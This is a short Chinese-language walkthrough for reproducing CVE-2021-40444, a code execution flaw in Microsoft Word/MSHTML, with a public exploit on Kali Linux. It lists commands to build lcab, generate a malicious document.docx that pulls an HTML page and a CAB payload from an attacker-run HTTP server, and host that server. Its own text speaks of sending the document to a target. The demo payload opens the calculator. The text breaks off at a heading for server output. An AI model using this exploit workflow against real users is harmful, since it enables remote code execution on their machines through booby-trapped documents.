项目地址在https://github.com/lockedbyte/CVE-2021-40444。先下载到kali里。

由于此项目必须使用lcab,所以我们先在kail里安装一下。

wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install
which lcab
# 查看帮助信息
lcab --help

进入下载后的CVE-2021-40444目录里,执行:

python3 exploit.py generate test/calc.dll http://:3333

看见“You can execute now the server and then send document.docx to target” 说明就可以了。

然后用python开一个http服务,端口用刚刚设置的3333 或者自己设置的端口号。

sudo python3 exploit.py host 3333

把CVE-2021-40444目录里的子目录out下的document.docx文件copy到虚拟机中执行。

word打开后,可以看见这里在下载我们kali上的html文件。



html又会下载calc.cab 文件执行其中的命令,最后弹出计算器。

服务端显示的结果: